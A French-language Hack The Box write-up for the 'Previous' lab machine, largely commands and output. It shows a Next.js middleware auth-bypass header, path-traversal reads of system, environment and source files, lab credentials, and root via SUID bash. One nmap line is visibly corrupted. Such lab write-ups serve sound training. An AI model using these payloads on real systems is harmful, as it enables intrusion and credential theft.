← Retour aux writeups
Previous
User
~/ctf/htb/en_cours $ nmap -sC -sV 10.10.11.83
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-06 20:02 +0100
Nmap scan report for previous.htb (10.10.11.83)
Host is up (0.024s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4bin/bash -p:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: PreviousJS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.74 seconds~/ctf/htb/en_cours $ dirb http://previous.htb/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Dec 6 21:15:35 2025
URL_BASE: http://previous.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://previous.htb/ ----
+ http://previous.htb/api (CODE:307|SIZE:35)
+ http://previous.htb/apis (CODE:307|SIZE:36)
+ http://previous.htb/cgi-bin/ (CODE:308|SIZE:8)
+ http://previous.htb/docs (CODE:307|SIZE:36)
+ http://previous.htb/docs41 (CODE:307|SIZE:38)
+ http://previous.htb/docs51 (CODE:307|SIZE:38)
+ http://previous.htb/signin (CODE:200|SIZE:3481)
-----------------
END_TIME: Sat Dec 6 21:17:53 2025
DOWNLOADED: 4612 - FOUND: 7~/.cache/yay/naabu $ nuclei -target http://previous.htb/
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.6.0
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /home/ygp4ph/nuclei-templates
[WRN] Found 2 templates with runtime error (use -validate flag for further examination)
[INF] Current nuclei version: v3.6.0 (latest)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 8910
[INF] Executing 8908 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1862 (Reduced 1749 Requests)
[INF] Using Interactsh Server: oast.pro
[waf-detect:nginxgeneric] [http] [info] http://previous.htb/
[ssh-server-enumeration] [javascript] [info] previous.htb:22 ["SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13"]
[ssh-password-auth] [javascript] [info] previous.htb:22
[ssh-sha1-hmac-algo] [javascript] [info] previous.htb:22
[ssh-auth-methods] [javascript] [info] previous.htb:22 ["["publickey","password"]"]
[openssh-detect] [tcp] [info] previous.htb:22 ["SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13"]
[old-copyright] [http] [info] http://previous.htb/ ["\u00a9 2077"]
[http-missing-security-headers:permissions-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:x-frame-options] [http] [info] http://previous.htb/
[http-missing-security-headers:x-content-type-options] [http] [info] http://previous.htb/
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://previous.htb/
[http-missing-security-headers:clear-site-data] [http] [info] http://previous.htb/
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:content-security-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:referrer-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://previous.htb/
[http-missing-security-headers:strict-transport-security] [http] [info] http://previous.htb/
[nginx-eol:version] [http] [info] http://previous.htb/ ["1.18.0"]
[nginx-version] [http] [info] http://previous.htb/ ["nginx/1.18.0"]
[options-method] [http] [info] http://previous.htb/ ["GET","HEAD"]
[tech-detect:next.js] [http] [info] http://previous.htb/
[tech-detect:nginx] [http] [info] http://previous.htb/
[caa-fingerprint] [dns] [info] previous.htb
[INF] Scan completed in 1m. 24 matches found.
~/.cache/yay/naabu $ /
/signin
/docs
/docs/[section]
/docs/components/layout
/docs/components/sidebar
/docs/content/examples
/docs/content/getting-started
/api
/api/auth/callback/credentials
/api/downloadet ca c’est tous les chemins mentionnés dans les différents js
dans le code source tous les liens vers des js commencent par /_next/static/chunks/ et apparemment c’est des lib nextjs ce qui parait logique vu le nom du site mdrr
toutes ces pages demandent un login
sur la page on a un contact jeremy@previous.htb qui peut servir pour le login
tenter une sqli rien ne marche et le chargement est super long
je dois tenter une auth bypass
je cherche nextjs auth bypass
PJ mes bb
j’ai pas reussi a savoir quelle version c’est donc j’ai tout testé et celle la marche
~/ctf/htb/en_cours $ curl -I -X GET 'http://previous.htb/docs' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 06 Dec 2025 21:48:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 3353
Connection: keep-alive
X-Powered-By: Next.js
ETag: "83h4wb4nfw2l1"
Vary: Accept-Encodingdonc on est sur la version 13.2.0
maintenant je le fais dans burp
je suis connecté
je navigues sur le site et dans la page d’exemples On observe que on peut telecharger des exemples
<p>Download the full example <a href="/api/download?example=hello-world.ts">here</a>!</p>lfi
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../../../../../../etc/passwd' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologinyen a que 2 qui ont un shell c’est root et node
je dois naviguer dans le code source pour trouver une rce
auth bypass > lfi > sourcecode > rce > revshell > user > root
verifier si l’interface est bien celle recommandée
Test avec le package json via la lfi en vain
bon rien de ce que je cherche ne fonctionne
je dois trouver des infos sur le code source de l’app
je retourne explorer la page
je telecharge le hello word complet
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../package.json' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
{
"private": true,
"scripts": {
"dev": "next dev",
"build": "next build"
},
"dependencies": {
"@mdx-js/loader": "^3.1.0",
"@mdx-js/react": "^3.1.0",
"@next/mdx": "^15.3.0",
"@tailwindcss/postcss": "^4.1.3",
"@tailwindcss/typography": "^0.5.16",
"@types/mdx": "^2.0.13",
"next": "^15.2.2",
"next-auth": "^4.24.11",
"postcss": "^8.5.3",
"react": "^18.2.0",
"react-dom": "^18.2.0",
"tailwindcss": "^4.1.3"
},
"devDependencies": {
"@types/node": "22.14.0",
"@types/react": "19.1.0",
"typescript": "5.8.3"
}
}ok enfaite il fallait tout simplemet utiliset un chemin relatif (j’etais en train de guess comme un abruti)
je cherche les variables d’environnement
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../.env' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
NEXTAUTH_SECRET=82a464f1c3509a81d5c973c31a23c61atoken généré :
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJqZXJlbXkiLCJlbWFpbCI6ImplcmVteUBwcmV2aW91cy5odGIiLCJhZG1pbiI6dHJ1ZSwiaWF0IjoxNTE2MjM5MDIyfQ.JS07CbQ534th6vJ4MExbyAT_DslRDIETnZsRIAe-nQEça marche pas
je continue d’explorer
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../../../../proc/self/cmdline' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
> -o o
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 15 100 15 0 0 120 0 --:--:-- --:--:-- --:--:-- 120
~/ctf/htb/en_cours $ \cat o
next-server (v% ~/ctf/htb/en_cours $ strings obon ..
next-server (v
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../../../../proc/self/environ' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
-o o
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 216 100 216 0 0 1594 0 --:--:-- --:--:-- --:--:-- 1588
~/ctf/htb/en_cours $ cat o
[bat warning]: Binary content from file 'o' will not be printed to the terminal (but will be present if the output of 'bat' is piped). You can use 'bat -A' to show the binary file contents.
~/ctf/htb/en_cours $ strings o
NODE_VERSION=18.20.8
HOSTNAME=0.0.0.0
YARN_VERSION=1.22.22
SHLVL=1
PORT=3000
HOME=/home/nextjs
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
NEXT_TELEMETRY_DISABLED=1
PWD=/app
NODE_ENV=productioninteressant je suis dans /app quand je fais ma lfi
je regarde tout ce qu’Il y a dans app
on a les pages de l’app router
apparamment manifest.json est autogénéré et sert au routage des requetes en prod
Test avec avec routes-manifest.json
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../.next/routes-manifest.json' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware'
{
"version": 3,
"pages404": true,
"caseSensitive": false,
"basePath": "",
"redirects": [
{
"source": "/:path+/",
"destination": "/:path+",
"internal": true,
"statusCode": 308,
"regex": "^(?:/((?:[^/]+?)(?:/(?:[^/]+?))*))/$"
}
],
"headers": [],
"dynamicRoutes": [
{
"page": "/api/auth/[...nextauth]",
"regex": "^/api/auth/(.+?)(?:/)?$",
"routeKeys": {
"nxtPnextauth": "nxtPnextauth"
},
"namedRegex": "^/api/auth/(?<nxtPnextauth>.+?)(?:/)?$"
},
{
"page": "/docs/[section]",
"regex": "^/docs/([^/]+?)(?:/)?$",
"routeKeys": {
"nxtPsection": "nxtPsection"
},
"namedRegex": "^/docs/(?<nxtPsection>[^/]+?)(?:/)?$"
}
],
"staticRoutes": [
{
"page": "/",
"regex": "^/(?:/)?$",
"routeKeys": {},
"namedRegex": "^/(?:/)?$"
},
{
"page": "/docs",
"regex": "^/docs(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs(?:/)?$"
},
{
"page": "/docs/components/layout",
"regex": "^/docs/components/layout(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/layout(?:/)?$"
},
{
"page": "/docs/components/sidebar",
"regex": "^/docs/components/sidebar(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/sidebar(?:/)?$"
},
{
"page": "/docs/content/examples",
"regex": "^/docs/content/examples(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/examples(?:/)?$"
},
{
"page": "/docs/content/getting-started",
"regex": "^/docs/content/getting\\-started(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/getting\\-started(?:/)?$"
},
{
"page": "/signin",
"regex": "^/signin(?:/)?$",
"routeKeys": {},
"namedRegex": "^/signin(?:/)?$"
}
],
"dataRoutes": [],
"rsc": {
"header": "RSC",
"varyHeader": "RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch",
"prefetchHeader": "Next-Router-Prefetch",
"didPostponeHeader": "x-nextjs-postponed",
"contentTypeHeader": "text/x-component",
"suffix": ".rsc",
"prefetchSuffix": ".prefetch.rsc",
"prefetchSegmentHeader": "Next-Router-Segment-Prefetch",
"prefetchSegmentSuffix": ".segment.rsc",
"prefetchSegmentDirSuffix": ".segments"
},
"rewriteHeaders": {
"pathHeader": "x-nextjs-rewritten-path",
"queryHeader": "x-nextjs-rewritten-query"
},
"rewrites": []
}on a "page": "/api/auth/[...nextauth]",
~/ctf/htb/en_cours $ curl 'http://previous.htb/api/download?example=../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js' \
-H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
> -o -
"use strict";(()=>{var e={};e.id=651,e.ids=[651],e.modules={3480:(e,n,r)=>{e.exports=r(5600)},5600:e=>{e.exports=require("next/dist/compiled/next-server/pages-api.runtime.prod.js")},6435:(e,n)=>{Object.defineProperty(n,"M",{enumerable:!0,get:function(){return function e(n,r){return r in n?n[r]:"then"in n&&"function"==typeof n.then?n.then(n=>e(n,r)):"function"==typeof n&&"default"===r?n:void 0}}})},8667:(e,n)=>{Object.defineProperty(n,"A",{enumerable:!0,get:function(){return r}});var r=function(e){return e.PAGES="PAGES",e.PAGES_API="PAGES_API",e.APP_PAGE="APP_PAGE",e.APP_ROUTE="APP_ROUTE",e.IMAGE="IMAGE",e}({})},9832:(e,n,r)=>{r.r(n),r.d(n,{config:()=>l,default:()=>P,routeModule:()=>A});var t={};r.r(t),r.d(t,{default:()=>p});var a=r(3480),s=r(8667),i=r(6435);let u=require("next-auth/providers/credentials"),o={session:{strategy:"jwt"},providers:[r.n(u)()({name:"Credentials",credentials:{username:{label:"User",type:"username"},password:{label:"Password",type:"password"}},authorize:async e=>e?.username==="jeremy"&&e.password===(process.env.ADMIN_SECRET??"MyNameIsJeremyAndILovePancakes")?{id:"1",name:"Jeremy"}:null})],pages:{signIn:"/signin"},secret:process.env.NEXTAUTH_SECRET},d=require("next-auth"),p=r.n(d)()(o),P=(0,i.M)(t,"default"),l=(0,i.M)(t,"config"),A=new a.PagesAPIRouteModule({definition:{kind:s.A.PAGES_API,page:"/api/auth/[...nextauth]",pathname:"/api/auth/[...nextauth]",bundlePath:"",filename:""},userland:t})}};var n=require("../../../webpack-api-runtime.js");n.C(e);var r=n(n.s=9832);module.exports=r})();% on a e.password===(process.env.ADMIN_SECRET??"MyNameIsJeremyAndILovePancakes")
MyNameIsJeremyAndILovePancakes
d’ailleurs au debut j’ai eu raison pour jeremy
ok ca fait 20 minutes que j’essaye de me connecter au site avec ces creds mais c’etait une simple password reuse donc Connexion SSH et j’ai le user
Root
-bash-5.1$ ls
docker user.txt
-bash-5.1$ cat docker/
cat: docker/: Is a directory
-bash-5.1$ cd docker/
-bash-5.1$ ls
docker-compose.yml previous
-bash-5.1$ cat docker-compose.yml
services:
next:
build: previous
restart: unless-stopped
ports:
- "127.0.0.1:3000:3000"
-bash-5.1$
-bash-5.1$ cd previous/
-bash-5.1$ ls
app.json components Dockerfile lib middleware.ts next.config.mjs package.json package-lock.json pages postcss.config.mjs public styles tsconfig.json
-bash-5.1$ cat Dockerfile
# syntax=docker.io/docker/dockerfile:1
FROM node:18-alpine AS base
# Install dependencies only when needed
FROM base AS deps
# Check https://github.com/nodejs/docker-node/tree/b4117f9333da4138b03a546ec926ef50a31506c3#nodealpine to understand why libc6-compat might be needed.
RUN apk add --no-cache libc6-compat
WORKDIR /app
# Install dependencies based on the preferred package manager
COPY package.json yarn.lock* package-lock.json* pnpm-lock.yaml* .npmrc* ./
RUN \
if [ -f yarn.lock ]; then yarn --frozen-lockfile; \
elif [ -f package-lock.json ]; then npm ci; \
elif [ -f pnpm-lock.yaml ]; then corepack enable pnpm && pnpm i --frozen-lockfile; \
else echo "Lockfile not found." && exit 1; \
fi
# Rebuild the source code only when needed
FROM base AS builder
WORKDIR /app
COPY --from=deps /app/node_modules ./node_modules
COPY . .
# Next.js collects completely anonymous telemetry data about general usage.
# Learn more here: https://nextjs.org/telemetry
# Uncomment the following line in case you want to disable telemetry during the build.
ENV NEXT_TELEMETRY_DISABLED=1
RUN \
if [ -f yarn.lock ]; then yarn run build; \
elif [ -f package-lock.json ]; then npm run build; \
elif [ -f pnpm-lock.yaml ]; then corepack enable pnpm && pnpm run build; \
else echo "Lockfile not found." && exit 1; \
fi
# Production image, copy all the files and run next
FROM base AS runner
WORKDIR /app
ENV NODE_ENV=production
# Uncomment the following line in case you want to disable telemetry during runtime.
ENV NEXT_TELEMETRY_DISABLED=1
RUN addgroup --system --gid 1001 nodejs
RUN adduser --system --uid 1001 nextjs
COPY --from=builder /app/public ./public
# Automatically leverage output traces to reduce image size
# https://nextjs.org/docs/advanced-features/output-file-tracing
COPY --from=builder --chown=nextjs:nodejs /app/.next/standalone ./
COPY --from=builder --chown=nextjs:nodejs /app/.next/static ./.next/static
USER nextjs
EXPOSE 3000
ENV PORT=3000
# server.js is created by next build from the standalone output
# https://nextjs.org/docs/pages/api-reference/config/next-config-js/output
ENV HOSTNAME="0.0.0.0"
CMD ["node", "server.js"]l’app nextjs est hébergée sur un docker exposé sur localhost 3000 avec redirection de port
-bash-5.1$ sudo -l
Matching Defaults entries for jeremy on previous:
!env_reset, env_delete+=PATH, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jeremy may run the following commands on previous:
(root) /usr/bin/terraform -chdir\=/opt/examples apply-bash-5.1$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-xr-x 1 root root 40496 Feb 6 2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 72072 Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55680 Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 35200 Apr 9 2024 /usr/bin/umount
-rwsr-xr-x 1 root root 44808 Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 232416 Jun 25 12:48 /usr/bin/sudo
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /usr/bin/bash
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 47488 Apr 9 2024 /usr/bin/mount
-rwsr-xr-x 1 root root 72712 Feb 6 2024 /usr/bin/chfn
-rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 338536 Apr 11 2025 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1-bash-5.1$ /usr/bin/terraform
Usage: terraform [global options] <subcommand> [args]
The available commands for execution are listed below.
The primary workflow commands are given first, followed by
less common or more advanced commands.
Main commands:
init Prepare your working directory for other commands
validate Check whether the configuration is valid
plan Show changes required by the current configuration
apply Create or update infrastructure
destroy Destroy previously-created infrastructure
All other commands:
console Try Terraform expressions at an interactive command prompt
fmt Reformat your configuration in the standard style
force-unlock Release a stuck lock on the current workspace
get Install or upgrade remote Terraform modules
graph Generate a Graphviz graph of the steps in an operation
import Associate existing infrastructure with a Terraform resource
login Obtain and save credentials for a remote host
logout Remove locally-stored credentials for a remote host
metadata Metadata related commands
modules Show all declared modules in a working directory
output Show output values from your root module
providers Show the providers required for this configuration
refresh Update the state to match remote systems
show Show the current state or a saved plan
stacks Manage HCP Terraform stack operations
state Advanced state management
taint Mark a resource instance as not fully functional
test Execute integration tests for Terraform modules
untaint Remove the 'tainted' state from a resource instance
version Show the current Terraform version
workspace Workspace management
Global options (use these before the subcommand, if any):
-chdir=DIR Switch to a different working directory before executing the
given subcommand.
-help Show this help output or the help for a specified subcommand.
-version An alias for the "version" subcommand.Recherche d'informations sur terraform (du go)
je ne peux donc faire que
/usr/bin/sudo /usr/bin/terraform -chdir\=/opt/examples applyje me cd vers le repertoire ou je peux faire ca
-bash-5.1$ pwd
/opt/examples
-bash-5.1$ ls -la
total 28
drwxr-xr-x 3 root root 4096 Dec 7 16:09 .
drwxr-xr-x 5 root root 4096 Aug 21 20:09 ..
-rw-r--r-- 1 root root 18 Apr 12 2025 .gitignore
-rw-r--r-- 1 root root 576 Aug 21 18:15 main.tf
drwxr-xr-x 3 root root 4096 Aug 21 20:09 .terraform
-rw-r--r-- 1 root root 247 Aug 21 18:16 .terraform.lock.hcl
-rw-r--r-- 1 root root 1097 Dec 7 16:09 terraform.tfstate
-bash-5.1$ cat main.tf
terraform {
required_providers {
examples = {
source = "previous.htb/terraform/examples"
}
}
}
variable "source_path" {
type = string
default = "/root/examples/hello-world.ts"
validation {
condition = strcontains(var.source_path, "/root/examples/") && !strcontains(var.source_path, "..")
error_message = "The source_path must contain '/root/examples/'."
}
}
provider "examples" {}
resource "examples_example" "example" {
source_path = var.source_path
}
output "destination_path" {
value = examples_example.example.destination_path
}je regarde si le main a une misconf qui permettrait une rce
aucun
Si je veux utiliser terraform apply je dois avoir un fichier exploit avec rce dedans (ou directement un cat flag)
je n’ai pas les droits d’écriture sur les fichiers interessants
je ne peux pas non plus creer un fichier ici pourtant c’est le seul endroit ou je peux sudo
# Source - https://stackoverflow.com/a
# Posted by Maaz A. malik
# Retrieved 2025-12-07, License - CC BY-SA 4.0
resource "aws_instance" "web" {
# ...
provisioner "local-exec" {
command = "echo ${self.private_ip} >> private_ips.txt"
}
}Tentative de une path hijacking pour mettre mon payload dans /tmp puis export path
sauf que sudo a une protection anti path hijacking
bon c’est pas la bonne issue je retourne a mes commandes
(merci l’oscp)
tout a l'heure
j’apprends actuellement que c’est pas normal
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /usr/bin/bashla je peux l’executer directemment et ca fa le faire en tant que root mddrr
je dois trouver un moyens de convertir cette info en shell
de ce que j’ai compris
Normalement, si /bin/bash est exécuté avec les privilèges suid (donc que l’utilisateur effectif est pas le meme que le vrai user) le suid est rétrogradé et il s’execute finalement en tant que l’user réel.
-p permet de ne pas faire ca (/bin/bash -p)
et je suis root